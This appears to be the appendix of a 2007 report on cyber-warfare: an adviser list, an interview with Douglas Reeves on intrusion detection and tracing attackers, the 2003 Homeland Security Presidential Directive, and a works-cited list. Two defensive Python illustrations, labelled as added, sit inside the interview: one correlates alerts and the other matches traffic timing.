Dr. Marvin J. Langston, Deputy Chief Information Officer, Department of Defense, 1998-2001; Director, Information Systems Office, Defense Advanced Research Projects Agency, 1997-98; Chief Information Officer, Department of Navy, 1996-1997
Karl N. Levitt, Director, Computer Science Laboratory, SRI International
John H. Lowry, Division Engineer, Technical Director for Information Security, BBN Technologies/Verizon
Stephen J. Lukasik, Consultant, Science Applications International Corporation; Former Director, Department of Defense Advanced Research Projects Agency; Former Chief Scientist, Federal Communications Commission
David Luckham, Research Professor of Electrical Engineering, Stanford University
Dr. Joseph Markowitz
Robert T. Marsh, General, USAF (Retired); Former Chairman, President's Commission on Critical Infrastructure Protection
Terry Mayfield, Institute for Defense Analyses
J.M. McConnell, Former Director, National Security Agency
John McHugh, PhD, Carnegie Mellon University
Fred B. Schneider, Professor of Computer Science and Director of Cornell/AFRL Information Assurance Institute
Gregg Schudel, Formerly Senior Engineer and Manager of Experimentation, DARPA; Alphatec, Inc.
Roderick A. Moore, Systems Engineer; Former National Security Council Staff, Pres. Reagan and Pres. Bush Administrations
Dr. Charles L. Moorefield, Board Chairman, Alphatech, Inc.
Peter G. Neumann, Computer Science Lab, SRI International
Dr. Clifford Neuman, Sr. Research Scientist and Associate Division Director -- Computer Networks Division, Information Sciences Institute, University of Southern California
E. Rogers Novak, Jr., Managing Member, Novak Biddle Venture Partners
Allen E. Ott, President, Orincon Information Assurance
Dr. Michael Paige, Former Director, Xerox PARC
Dr. Vern Paxson, Senior Scientist, International Computer Science Institute; Staff Scientist, Lawrence Berkeley National Laboratories
Phillip A. Porras, Program Director, System Design Laboratory, SRI International
Laura S. Tinnel, Deputy Program Manager and Research Scientist, Information & Systems Assurance Group
Professor of Computer Science, Director of the UC Davis Security Laboratory, Department of Computer Science, University of California, Davis
Marcus Ranum, Chief Technology Officer, NFR Security, Inc.
Jaisook Rho, Principal Computer Scientist, Network Associates, Inc.
Dr. Arthur S. Robinson, President, System/Technology Development Corporation; Formerly Technical Director of RCA R&D for U.S.N. Aegis Weapons Systems
S. Shankar Sastry, Professor and Chair, Department of Electrical Engineering and Computer Sciences; Formerly Director, Information Technology Office, DARPA, US DoD; Information Assistance Program
Larry J. Schumann, President, EnterpriseTec, Inc.; Member of the President's National Security Telecommunications Advisory Committee (1996-2000)
Jonathan M. Smith, Professor, Computer and Information Science Department, University of Pennsylvania; Teknowledge Corporation
J. Douglas Tygar, Professor of Computer Science and Information Management, University of California, Berkeley
J. Kendree Williams, Chief Technology Officer, Zel Technologies, LLC; CDR, USN (Ret)
R. James Woolsey, Director of Central Intelligence, 1993-95
Larry T. Wright, Chairman, Defense Science Board Task Force on Defensive Information Operations, 2000-2001


8.3 Interview with Douglas Reeves

The following are excerpts from an interview with Dr. Douglas Reeves, a member of N.C. State's Cyber Defense Laboratory, on November 6, 2007.

What is your definition of cyber-warfare?

I'm not sure I have one, but I'll make one up. It's people trying to protect their assets, and people trying to take advantage of those assets, conflicting with each other. Assets can mean your computer system, your network, your data, your private information--it could mean a variety of things.

What kind of research have you done in the area of cybersecurity?

For about seven or eight years, I've worked in the field of network security, which has involved a number of different projects. I've done some work on intrusion detection, which is how you tell if someone's attacking you. Sometimes it's not obvious until the damage is already done, so you'd like to detect it as early as you can. I've also done some work on what I'll generically call forensics, or finding out who's attacking you. Just as in conventional crime, you want to be able to prosecute somebody if they've committed a crime. You'd like to know who's attacking your system.

More recently, I've had a project that has to do with software security. What are the ways in which people break software, and how can you recognize when something is an attempt to break or misuse software? The attackers are quite clever, actually. This is one of the more interesting sides of research in this field, that your adversary is a person--you’re not fighting the laws of physics, or some abstract cost factors or availability or properties of materials or the capabilities of manufacturers, the standard stuff that you do in engineering. What you're fighting is other people, so it's very interesting, because people--including the bad guys--are extremely clever. In fact, maybe especially the bad guys.

What are some of the projects the Army Research Organization had you work on?

That was mainly for intrusion detection. Most of us now have some form of intrusion detection. You just call it a virus checker. You know that when you have attachments for emails, you need to check before you open them whether there's some exploit embedded in that attachment. Besides what we run on our personal computers, corporations and enterprises like universities also inspect incoming traffic across the enterprise to see whether it contains attempts to break into computer systems, or what they can notice when someone's attempting to break into computer systems. There are a wide variety of products; this type of thing has been available for at least ten years, and some of them are commercially very successful and well documented.

One common problem with intrusion detection is that it's almost too good. Imagine if you had an alarm system, and you wanted to be sure that any attempt to break into your home, whether it was coming through a window or picking a lock or any other means of entry someone might have, you want to make sure that you detected it, that it was sensitive enough that you would never miss any attempt to break into your home. That would be very desirable, but it would be very unfortunate if the result was that the alarm was so sensitive that it kept going off all the time. You know, a bird flies past the building and the alarm goes off, or a heavy truck rumbles by on the road and the system thinks that's a break-in attempt and sets an alarm. So the real problem with a lot of intrusion detection systems is that to make them very accurate, they're set to be so sensitive that they squawk about all kinds of stuff, some of which is not attacks and some of which is.

Another problem is that many attacks are conducted in multiple steps. So, again to take the analogy of someone breaking into your home or office, maybe there are multiple steps to enter. Maybe they have to go into an entry gate, then they have to evade detection by a security camera, and then thirdly they have to figure out the combination to a door lock, and then fourthly they have to turn off the burglar alarm. So, there's a series of stuff they have to do. Well, if there is an attack but it takes a hundred steps, and you get an alarm for every one of those steps, then the combination of being overly sensitive and giving you information about every individual potential step--and imagine this is not an alarm system for one home or office, but it's for a thousand places of business, as intrusion detection for an enterprise is--the result of that is that you, the security administrator, are sitting there in front of a log looking at 10,000 messages a day go by, and you just can't deal with that volume of information. It's too much. So one choice is that you turn down your alarm to be less sensitive, so it doesn't keep squawking all the time, but you stand the chance of missing something if you do that, so there's a tradeoff.

Our particular research was, don't make the alarm systems less sensitive, but process the information produced by the alarm systems to do some of the kind of mental digestion or processing of the alarm information that previously had been done in people's heads, then present to them your summary of what that information might mean. Now instead of there being a hundred events related to a break-in, it might say, "I think there's been a break-in, and if you want more information, click here and I'll show you the steps that led to me concluding that there might have been a break-in." Or if you find that there are sequences of events that individually could be part of attacks, it turns out that those particular sequences of events are exhibited by innocuous, benign activities that are known to be people accessing databases for legitimate purposes. Then you can say, "After analyzing the low-level data, I can conclude there's no reason for you to be alerted this time."

So that's what we were doing for the army--analysis of the data that's used for intrusion detection systems.
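The alert-processing approach Reeves describes (keep the sensors sensitive, but digest the raw alerts into a verdict with the supporting steps available on demand, and recognise event sequences that are known to come from legitimate activity) can be shown in miniature. The Python below is an added example written for this transcript, not code from the interview or from the N.C. State Cyber Defense Laboratory; the alert lines, the attack chain and the benign profile are all constructed for illustration.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Alert:
    ts: int     # seconds since an arbitrary epoch
    src: str    # source address the sensor attributed the event to
    kind: str   # the sensor's event label


# Constructed sample sensor output (hypothetical; not real logs).
# Nine low-level alerts from three sources.
RAW_ALERTS = """\
100 10.0.0.5 port_scan
160 10.0.0.5 login_failure
170 10.0.0.5 login_failure
200 10.0.0.5 login_success
230 10.0.0.5 privilege_change
300 10.0.0.9 db_connect
305 10.0.0.9 large_query
310 10.0.0.9 db_connect
900 10.0.0.7 port_scan
"""

# Ordered steps of a hypothetical multi-step break-in. The chain matches when
# these labels appear in this order within one session; other events may be
# interleaved, so the analyst does not have to see them one by one.
ATTACK_CHAIN = ("port_scan", "login_failure", "login_success", "privilege_change")

# Event mixes known to be produced by legitimate activity (hypothetical):
# a nightly reporting job that opens database connections and runs big queries.
BENIGN_PROFILES = [frozenset({"db_connect", "large_query"})]

SESSION_GAP = 600  # seconds of silence that closes a source's session


def parse_alerts(text: str) -> List[Alert]:
    """Parse 'timestamp source kind' lines into Alert records, oldest first."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, kind = line.split()
        alerts.append(Alert(int(ts), src, kind))
    return sorted(alerts, key=lambda a: a.ts)


def sessionize(alerts: List[Alert], gap: int = SESSION_GAP) -> List[List[Alert]]:
    """Group alerts by source, splitting a source's stream when it goes quiet for > gap."""
    by_src: Dict[str, List[Alert]] = defaultdict(list)
    for a in alerts:
        by_src[a.src].append(a)
    sessions = []
    for src_alerts in by_src.values():
        current = [src_alerts[0]]
        for a in src_alerts[1:]:
            if a.ts - current[-1].ts > gap:
                sessions.append(current)
                current = []
            current.append(a)
        sessions.append(current)
    return sessions


def contains_in_order(kinds: List[str], chain) -> bool:
    """True if every step of chain occurs in kinds in chain order (gaps allowed)."""
    i = 0
    for k in kinds:
        if i < len(chain) and k == chain[i]:
            i += 1
    return i == len(chain)


def classify(session: List[Alert]) -> dict:
    """Reduce one session to a verdict, keeping the raw steps as on-demand evidence."""
    kinds = [a.kind for a in session]
    if contains_in_order(kinds, ATTACK_CHAIN):
        verdict = "incident"          # the full multi-step chain was observed
    elif any(set(kinds) <= profile for profile in BENIGN_PROFILES):
        verdict = "benign"            # matches a known legitimate activity profile
    else:
        verdict = "low_confidence"    # partial evidence only; no alert raised yet
    return {"src": session[0].src, "verdict": verdict,
            "raw_alerts": len(session), "steps": kinds}


def summarize(text: str) -> List[dict]:
    """Turn a raw alert feed into one summary per session instead of one line per alert."""
    return [classify(s) for s in sessionize(parse_alerts(text))]


if __name__ == "__main__":
    for s in summarize(RAW_ALERTS):
        print(f"{s['src']:10} {s['verdict']:15} ({s['raw_alerts']} raw alerts)")
```

Nine raw alerts collapse to three summaries: one incident with its evidence chain attached, one suppressed as a known benign profile, and one lone scan held back as low confidence rather than paged to the analyst.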

Once an intruder is detected, how difficult is it to detect what geographic location the intrusion came from?

In general, it's extremely difficult. The joke that I tell in some presentations is that what the defenders want is what you see in TV shows. In a cop show or whatever, somebody's in a chat room for pedophiles or something, and they say, "Get a trace on that guy," and then the next frame they're banging on the door of Apartment 3-G on 65 Main Street, and throwing the guy on the floor. You want that traceability, not to an IP address, but to a geographic location, because you want to be able to send the cops or the military to that location.

That's what we would all like, but unfortunately, it doesn't work like that. There are many concealment techniques, many techniques for making it difficult or impossible for someone to tell where you are when you launch an attack or set an attack in motion. That's been one of our main research projects for quite a while, is how to combat at least some of the more widely used techniques.

So, another analogy here is that you're trying to trace somebody and periodically, that person goes in buildings and you don't have access to those buildings they go into. You can watch all the exits to see if they emerge at some new location and start in new directions so you don't lose the trail. But you can't go in the building. But while they're in the building, they can undergo all kinds of disguises. They can change their shoes, they can stand taller, they can have new facial hair, they can put on new clothing, they can don glasses, all the standard stuff you can use for disguise. So you watch all these exits, but you have to somehow detect that it's them coming out even though they're wearing an elaborate disguise. And particularly if it's a building with lots of people going in and coming out, that's not exactly trivial to do. It's going to be a pretty difficult task.

So what you'd like to do is pick some characteristic of a person that's somewhat difficult to disguise--not impossible, but somewhat difficult to disguise--and if you key in on whether they have a mustache or not, obviously they can put on or shave a mustache. If you key in on their weight, it's a little more difficult to disguise their weight. But to use something that's somewhat similar to what we do, if you key in on the way they walk, it's a little difficult to disguise the way they walk. You can try to fake a limp or walk faster than you typically do, or take shorter steps, but it turns out the way you walk is fairly characteristic of a person's skeletal structure and habits. It's not completely straightforward to change the way you walk. So we have conducted research on the equivalent of this, which is looking at the timing characteristics of traffic, which are difficult to disguise. They can be modified, but we're able to overcome the simpler modifications that people might try, so that we can still recognize those timing characteristics.

So is getting into a computer system and hiding your identity something an amateur hacker can do?

Well, in the hacker community, the term hacker is a contentious term, because in some circles,

the term hacker doesn't mean a bad person, it just means a skilled person. There is another term,

cracker or blackhead or bad guy or something like that, would be more widely agreed upon than

hacker.

The hacker community, unfortunately, shares what they know. They're very generous with each

other. So, they go out of their way to make stuff easy to use and download, and well

documented, and as close to pushbutton automation as you can make it, which means that a

moron can use this stuff. If somebody gives them a link to find whatever it is that they want, to

try it out and direct it at whatever your target is takes almost no intelligence whatsoever. So, it

not hard at all to use these things.
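The traffic-timing idea the interviewee describes, tracing an intruder through a host you cannot see into by matching the "gait" of the traffic rather than its addresses, as an added illustration (this is not code from the report or from the interviewee's research). It compares the inter-packet delay sequences of a flow entering a relay and the flows leaving it, so that a constant added latency, the simplest disguise, has no effect. The sample flows are constructed, and the relay model (fixed latency plus bounded jitter) and the 0.8 match threshold are assumptions for the demonstration.

```python
"""Inter-packet timing as a flow fingerprint for stepping-stone tracing.

Added illustration; sample data below is constructed and the relay model
is an assumption, not a measurement of any real system.
"""
from itertools import accumulate
from statistics import mean, pstdev
import random


def inter_packet_delays(timestamps):
    """Gaps between consecutive packet arrival times (seconds)."""
    return [b - a for a, b in zip(timestamps, timestamps[1:])]


def pearson(xs, ys):
    """Pearson correlation of two sequences (truncated to the shorter one).

    Returns 0.0 when either sequence is constant, i.e. carries no signature
    (a fixed-rate bulk transfer, for instance).
    """
    n = min(len(xs), len(ys))
    xs, ys = xs[:n], ys[:n]
    mx, my = mean(xs), mean(ys)
    sx, sy = pstdev(xs), pstdev(ys)
    if sx == 0 or sy == 0:
        return 0.0
    return sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / (n * sx * sy)


def timing_similarity(flow_a, flow_b):
    """Correlate the inter-packet delay sequences of two flows.

    Comparing gaps rather than absolute times makes a constant added latency
    irrelevant, and Pearson's coefficient is unchanged by a uniform speed-up
    or slow-down of the whole sequence (the 'walking faster' disguise).
    """
    return pearson(inter_packet_delays(flow_a), inter_packet_delays(flow_b))


def relay(flow, latency, jitter, seed=1):
    """Assumed stepping-stone behaviour: forward each packet after a fixed
    latency plus a little random jitter (deterministic for a given seed)."""
    rng = random.Random(seed)
    return [t + latency + rng.uniform(0, jitter) for t in flow]


# Constructed sample: keystroke-like gaps of an interactive session seen
# on the way into the relay.
UPSTREAM_IPDS = [0.4, 0.1, 1.2, 0.3, 0.05, 2.0, 0.2, 0.6, 0.15, 0.9, 0.3]
UPSTREAM = list(accumulate([10.0] + UPSTREAM_IPDS))

# The same session observed leaving the relay, 0.25 s later with jitter.
DOWNSTREAM = relay(UPSTREAM, latency=0.25, jitter=0.02)

# A different interactive session leaving the same relay. It uses the same
# gap values in a different order, so average rate alone cannot tell the
# two apart; only the ordering of the gaps does.
OTHER_IPDS = [2.0, 0.2, 0.3, 0.1, 0.9, 0.05, 0.6, 0.4, 0.3, 1.2, 0.15]
OTHER = list(accumulate([10.3] + OTHER_IPDS))


def match_outgoing(upstream, candidates, threshold=0.8):
    """Names of the outgoing flows whose timing signature matches `upstream`."""
    return [name for name, flow in candidates.items()
            if timing_similarity(upstream, flow) >= threshold]


if __name__ == "__main__":
    print("same session through relay:",
          round(timing_similarity(UPSTREAM, DOWNSTREAM), 3))
    print("unrelated session:         ",
          round(timing_similarity(UPSTREAM, OTHER), 3))
    print("matches:", match_outgoing(
        UPSTREAM, {"downstream": DOWNSTREAM, "other": OTHER}))
```

The relayed copy of the session correlates almost perfectly with the original while the unrelated session does not, even though both leave the relay at the same average rate. The caveat the interviewee raises still applies: an intermediary that deliberately re-times or pads traffic can weaken the signature, and a short session gives too few gaps for a confident match, so a real deployment would also want a minimum sample length before reporting a match.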


8.4 DHS Presidential Directive

December 17, 2003 Homeland Security Presidential Directive

The Homeland Security Presidential Directive of December 17th, 2003 establishes a more concrete list of responsibilities assigned to several departments within the United States Government.

(a) The Department of State, in conjunction with the Department, and the Departments of Justice, Commerce, Defense, the Treasury and other appropriate agencies, will work with foreign countries and international organizations to strengthen the protection of United States critical infrastructure and key resources.

(b) The Department of Justice, including the Federal Bureau of Investigation, will reduce domestic terrorist threats, and investigate and prosecute actual or attempted terrorist attacks on, sabotage of, or disruptions of critical infrastructure and key resources. The Attorney General and the Secretary shall use applicable statutory authority and attendant mechanisms for cooperation and coordination, including but not limited to those established by presidential directive.

(c) The Department of Commerce, in coordination with the Department, will work with private sector, research, academic, and government organizations to improve technology for cyber systems and promote other critical infrastructure efforts, including using its authority under the Defense Production Act to assure the timely availability of industrial products, materials, and services to meet homeland security requirements.

(d) A Critical Infrastructure Protection Policy Coordinating Committee will advise the Homeland Security Council on interagency policy related to physical and cyber infrastructure protection. This PCC will be chaired by a Federal officer or employee designated by the Assistant to the President for Homeland Security.

(e) The Office of Science and Technology Policy, in coordination with the Department, will coordinate interagency research and development to enhance the protection of critical infrastructure and key resources.

(f) The Office of Management and Budget (OMB) shall oversee the implementation of government-wide policies, principles, standards, and guidelines for Federal government computer security programs. The Director of OMB will ensure the operation of a central Federal information security incident center consistent with the requirements of the Federal Information Security Management Act of 2002.

(g) Consistent with the E-Government Act of 2002, the Chief Information Officers Council shall be the principal interagency forum for improving agency practices related to the design, acquisition, development, modernization, use, operation, sharing, and performance of information resources of Federal departments and agencies.

(h) The Department of Transportation and the Department will collaborate on all matters relating to transportation security and transportation infrastructure protection. The Department of Transportation is responsible for operating the national air space system. The Department of Transportation and the Department will collaborate in regulating the transportation of hazardous materials by all modes (including pipelines).

(i) All Federal departments and agencies shall work with the sectors relevant to their responsibilities to reduce the consequences of catastrophic failures not caused by terrorism.265

265 Bush, George W. "December 17, 2003 Homeland Security Presidential Directive." The White House. 17 Dec. 2003. US Government. <http://www.whitehouse.gov/news/releases/2003/12/20031217-5.html>.


8.5 Works Cited

Airsnort Homepage. 31 Dec 2004. The Shmoo Group. 30 Oct 2007. <http://airsnort.shmoo.com/>.

Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly Spring 2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf>.

"An Analysis of the Consequences of the August 14th 2003 Power Outage and its Potential Impact on Business Strategy and Local Public Policy". 2004. <http://www.acp-international.com/southtx/docs/ne2003.pdf>

Brewin, Bob (2007). "Army, Air Force seek to go on offensive in cyber war". 30 October, 2007. http://www.govexec.com/story_page.cfm?filepath=/dailyfed/0607/061307bb1.htm

Bush, George W., and Jim Turner. "E-Government Act of 2002." The White House. 15 Nov. 2002. US Government. <http://www.whitehouse.gov/omb/egov/g-4-act.html>.

http://www.buyerzone.com/facilities/generators/rbic-taking-stock.html

Byres, Eric, and Justin Lowe. The Myths and Facts Behind Cyber Security Risks for Industrial. British Columbia Institute of Technology. 1-6. 15 Oct. 2007 <http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.

"Capital Commerce. So How Goes Bin Laden's War on the U.S. Economy?" Pethokoukis, James. September 11, 2007.

"CENTCOM Operation Iraqi Freedom Briefing - 25 March 2003". October 30, 2007. <http://www.gulfinvestigations.net/document348.html?PHPSESSID=64c6f060d1f4997faf0ff91799fa777f>

CERT Coordination Center – Denial of Service Attacks. 4 Jun 2001. US CERT. 30 Oct 2007 http://www.cert.org/tech_tips/denial_of_service.html

http://www.cfr.org/content/publications/attachments/Homeland_TF.pdf

Clough, B.T., Cope, B., & Donley, S. (1993). Microwave induced upset of digital flight control systems. Digital Avionics Systems Conference. 12, 179-184.

http://www.cooperativeresearch.org/entity.jsp?entity=eiffel_tower Profile: Eiffel Tower. December 24, 1994: Al-Qaeda Connected Militants Attempt to Crash Passenger Jet into Eiffel Tower.

"Computer Crime Cases." Computer Crime and Intellectual Property Section. US Department of Justice. <http://www.usdoj.gov/criminal/cybercrime/cccases.html>.

Convention on Cybercrime. Council of Europe. 23 Nov. 2001 http://conventions.coe.int/Treaty/Commun/QueVoulezVous.asp?NT=185&CL=ENG

Crenshaw, Adrian. A Quick Intro to Sniffers. 30 July 2007. Irongeek.com. 30 Oct 2007. <http://www.irongeek.com/i.php?page=security/AQuickIntrotoSniffers>.

Critical Infrastructure Assurance Group Online. Retrieved November 1, 2007, from Security@Cisco Web site: http://www.cisco.com/web/about/security/security_services/ciag/index.html

"Cyber-war!" PBS: Frontline. April 2003. 29 Oct. 2007 http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/


"Cyber War Nightmares" (2006). 30 October, 2007. http://www.strategypage.com/htmw/htiw/articles/20060829.aspx

"Cyberwarfare on the Electricity Infrastructure." Office of Scientific and Technical Information. 12 Sep. 2007. <http://www.osti.gov/bridge/product.biblio.jsp?osti_id=769245>

Dagon, David. Mobile Phones as Computing Devices: The Viruses Are Coming! IEEE Pervasive Computing. Oct–Dec 2004. 11–15.

"Data and Statistics". International Monetary Fund. 17 Oct 2007. 27 Oct 2007. <http://www.imf.org/external/data.htm#data>

Denning, D. (2001). "Is Cyber Terror Next?" New York: U.S. Social Science Research Council, at http://www.ssrc.org/sept11/essays/denning.htm

Delio, Michelle. Crackers Expand Private War. 18 Apr 2001. Wired Magazine. 30 Oct 2002. <http://www.wired.com/politics/law/news/2001/04/43134?currentPage=2>

Delio, Michelle. A Chinese Call to Hack the US. 11 Apr 2001. Wired Magazine. 30 Oct 2002. <http://www.wired.com/politics/law/news/2001/04/42982?currentPage=2>

Denning, Dorothy. "Activism, Hacktivism, and Cyberterrorism: The Internet as a Tool for Influencing Foreign Policy." Internet and International Systems. December 1999: 101-120. 28 Oct. 2007 <http://www.nautilus.org/gps/info-policy/workshop/papers/denning.html>

De Souza Reis, Ademar, and Filho, Milton Soares. Sniffdet – Remote Sniffer Detector for Linux. 10 Oct 2006. SourceForge.net. 30 Oct 2007. <http://sniffdet.sourceforge.net/>.

Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool. 21 Oct 1999. University of Washington. http://staff.washington.edu/dittrich/misc/trinoo.analysis

Dot.Con: The Dangers of Cyber Crime and a Call for Proactive Solutions. Granville, J. Australian Journal of Politics & History. March, 2003, Vol. 49 Issue 1. Pg. 104.

Dumpster Diving. Washington State Office of the Attorney General. 26 Nov 2007. http://www.atg.wa.gov/ConsumerIssues/ID-Privacy/DumpsterDiving.aspx

http://www.epri-intelligrid.com/intelligrid/docs/Cost_of_Power_Disturbances_to_Industrial_and_Digital_Technology_Companies.pdf

Evers, Joris. Russian hackers 'sold WMF exploit'. 3 Feb 2006. ZDNet.co.uk. 26 Nov 2007. http://news.zdnet.co.uk/software/0,1000000121,39250232,00.htm

FAA Air Traffic Organization. (2006). Moving America safely: 2005 annual performance report. Washington, D.C.: Federal Aviation Administration.

"Fact Sheet: Protecting America's Critical Infrastructure – Cyber Security." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/press_room/050215cybersec.html>.

http://www.fas.org/irp/crs/RL30735.pdf

"FISMA." National Institute of Standards and Technology. 24 Oct. 2002. US Government. <http://csrc.nist.gov/groups/SMA/fisma/>.


http://www.frontpagemag.com/articles/Read.aspx?GUID={245984FA-D9DF-46E9-8EF3-7B5259A51C0D} Clinton and 9/11. Favish, Allen J. FrontPageMagazine.com. Tuesday, October 14, 2003.

Feds Warn of May Day Attacks on US Web Sites. 26 Apr 2001. CNN. 30 Oct 2002. http://archives.cnn.com/2001/TECH/internet/04/26/hacker.warning/index.html

Gagnon, B. (2004). Are We Headed For a Cyber-09/11? The American Failure in Cyberstrategy. Conference Papers -- International Studies Association. Retrieved October 24, 2007, from Academic Search Premier database.

http://www.gao.gov/new.items/d05712.pdf

Garber, Lee. Denial-of-Service Attacks Rip The Internet. IEEE Computer. Apr 2000. 12–17.

Garretson, Cara. Spam that delivers a pink slip. ComputerWorld.com. 1 Nov 2006. 26 Nov 2007. http://computerworld.com/action/article.do?articleId=9004698&command=viewArticleBasic&taxonomyName=security

Gellman, Barton. "U.S. Fears Al Qaeda Cyber Attacks." SecurityFocus 26 June 2002. 18 Oct. 2007 <http://www.securityfocus.com/news/502>.

Glaessner, Thomas, Tom Kellermann, and Valerie McNevin (2002). "Electronic Security: Risk Mitigation In Financial Transactions". The World Bank. p 43. 29 Oct 2007. <http://info.worldbank.org/etools/docs/library/83592/esecurity_risk_mitigation.pdf>

Global Society: Journal of Interdisciplinary International Relations; Jan 2003, Vol. 17 Issue 1, p89, 9p.

Government Accountability Office. (2003). Information security: Progress made, but Federal Aviation Administration needs to improve controls over air traffic systems. Washington, D.C.: Government Accountability Organization.

"Government Collaboration Groups and Efforts." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/federal/collaboration.html>.

Greenwell, W.S. and J.G. Alsbrooks (2007). Excerpt From "Digital Control Systems". Retrieved November 3, 2007, from IEEE Computer Society Web site: http://www.computer.org/portal/site/ieeecs/menuitem.c5efb9b8ade9096b8a9ca0108bcd45f3/index.jsp?&pName=ieeecs_level1&path=ieeecs/ReadyNotes&file=s_k_sample.xml&xsl=generic.xsl&

Grifter. Dumpster Diving – One Man's Trash… Hack In The Box. 2002. 26 Nov 2007. http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=6388&mode=thread&order=0&thold=0

Gwin, Peter. (2001) "Is the Internet the Next Front in the Terror War?" Europe. Issue 410.

Hancock, Bill. National Infrastructure Protection Issues. International Telecommunication Union. 2002. 25 Oct. 2007 <http://www.itu.int/osg/spu/ni/security/workshop/presentations/cni.18.pdf>.

Highland, Harold Joseph. A history of computer viruses -- Introduction. Computers & Security. Vol 16, Issue 5. 1997, p 412-415. http://www.sciencedirect.com/science/article/B6V8G-3SX269W-2P/2/e96ee1d35ae6e62abd338c29a32234a7

Harris, Leslie. http://abcnews.go.com/Technology/Story?id=3771510&page=1

Heise Security (2007, October 11). Report: Cisco closes down Critical Infrastructure Assurance security research group. Retrieved November 3, 2007, from Heise Security Web site: http://www.heise-security.co.uk/news/97205


Hildreth, Steven A. "Cyberwarfare." CRS Report for Congress. June 19, 2000. <http://www.fas.org/irp/crs/RL30735.pdf>.

"Homeland Security and Defense Telecommunications Spending to Increase 40 Percent by 2009." Business Wire. 3 August 2004. 28 Oct. 2007. <http://findarticles.com/p/articles/mi_m0EIN/is_2004_August_3/ai_n6139915>

http://www.fas.org/irp/threat/frd.html The Sociology and Psychology of Terrorism: Who Becomes a Terrorist and Why? Hudson, Rex A. September, 1999. A Report Prepared under an Interagency Agreement by the Federal Research Division, Library of Congress.

"Interview: O. Sami Saydjari." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007 <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/saydjari.html>

"Israeli Citizen Attacks Government Computers." Computer Crime and Intellectual Property Section. US Department of Justice. <http://www.usdoj.gov/criminal/cybercrime/cccases.html>.

Ito, Harumi, and Darin Lee. Assessing the Impact of the September 11 Terrorist Attacks on U.S. Airline Demand. Dept. of Econ., Brown U. 2004. 3-24. 26 Oct. 2007.

Kabay, M. E. (2003) "Tapping Fiber Optics Gets Easier". Network World. 29 Oct 2007. http://www.networkworld.com/newsletters/sec/2003/0303sec1.html

Kessler, Gary. Defense against Distributed Denial of Service Attacks. Nov 2000. 30 Oct 2007 http://www.garykessler.net/library/ddos.html

Know Your Enemy – Tools and Methodologies. 21 Jul 2000. 30 Oct 2007. http://www.honeynet.org/papers/enemy/index.html

Krebs, Brian. "Cyber war games test future troops." Washington Post: April 23, 2003.

Laprise, John. IEEE Technology & Society Magazine. Vol. 25 Issue 3, pg. 28.

Laribee, Lena, et al. Analysis and Defensive Tools for Social-Engineering Attacks on Computer Systems. Information Assurance Workshop, 2006 IEEE. 388–389, 21-23 June 2006.

Lemos, Robert. "SCADA System Makers Pushed Toward Security." SecurityFocus 26 July 2006. 19 Oct. 2007 <http://www.securityfocus.com/news/11402/2>.

Lineweber, David and Shawn McNulty (2001). "The Cost of Power Disturbances to Industrial & Digital Economy Companies". Electric Power Research Institute, Inc. 30 Oct 2007. <http://www.epri-intelligrid.com/intelligrid/docs/Cost_of_Power_Disturbances_to_Industrial_and_Digital_Technology_Companies.pdf>

Lester W. Grau and Timothy L. Thomas. "A Russian View of Future War: Theory and Direction," The Journal of Slavic Military Studies. Issue 9.3 (Sept. 1996), pp. 501-518.

Lewis, J. (2002). Assessing the risks of cyber terrorism, cyber war and other cyber threats. Washington, D.C.: Center for Strategic & International Studies.

Mendis, Surakshan. Packet Sniffing. 2005. SuraSoft. 30 Oct 2007. <http://www.surasoft.com/articles/packetsniffing.php>.

Meserve, J. "Staged cyber attack reveals vulnerability in power grid." CNN. 26 September 2007. 4 Oct. 2007. <http://www.cnn.com/2007/US/09/26/power.at.risk/>


Messmer, Ellen (2006, March 14). IBM survey on cybercrime shows IT managers wary. Retrieved November 1, 2007, from Network World Web site: http://www.networkworld.com/news/2006/031406-ibm-survey-cybercrime.html

Mitnick, Kevin, & Simon, William L. (2005). The Art of Intrusion: When Terrorists Come Calling. Indianapolis, IN: John Wiley and Sons, Inc.

Moore, David et al. Inferring Internet Denial of Service Activity. ACM Transactions on Computer Systems. Vol. 24, No. 2, May 2006, 115–139.

Moore, J. (2007, February 26). Freight security programs and test projects proliferate. Retrieved October 25, 2007, from FCW.com Web site: http://www.fcw.com/print/13_5/news/97727-1.html

Mullen, M. (2004, September 16). Human error caused chaos in the sky. Retrieved October 25, 2007, from MSNBC Online Web site: http://www.msnbc.msn.com/id/6021929/

"Multi-State Information Sharing and Analysis Center (MS-ISAC)." 2006. Multi-State Information Sharing and Analysis Center (MS-ISAC). 21 Oct. 2007 <http://www.msisac.org/scada/>.

Nachenberg, Carey. "Computer Virus-antivirus Coevolution." Communications of the ACM 40.1 (1997): 46-51.

Naraine, Ryan. Hackers Selling Vista Zero-Day Exploit. 15 Dec 2006. eWeek.com. 26 Nov 2007. <http://www.eweek.com/article2/0,1895,2073611,00.asp>

National Cyber Security Alliance: Stay Safe Online. Retrieved October 31, 2007, from Stay Safe Online Web site: http://www.staysafeonline.org/

"National Cyber Security Division." Department of Homeland Security. 23 Sept. 2006. US Government. <http://www.dhs.gov/xabout/structure/editorial_0839.shtm>.

"National Infrastructure Advisory Council." Department of Homeland Security. Oct. 2007. US Government. <http://www.dhs.gov/xprevprot/committees/editorial_0353.shtm>.

"National Infrastructure Protection Center Highlights". National Infrastructure Protection Agency. 15 June 2001, p. 2. 30 Oct 2007 http://www.iwar.org.uk/infocon/nipc-highlights/2002/highlight02-03.pdf

"National Security Advisor Rice on Protecting U.S. Infrastructure". 22 March 2001. 27 Oct 2007. http://www.usembassy.it/file2001_03/alia/a1032210.htm

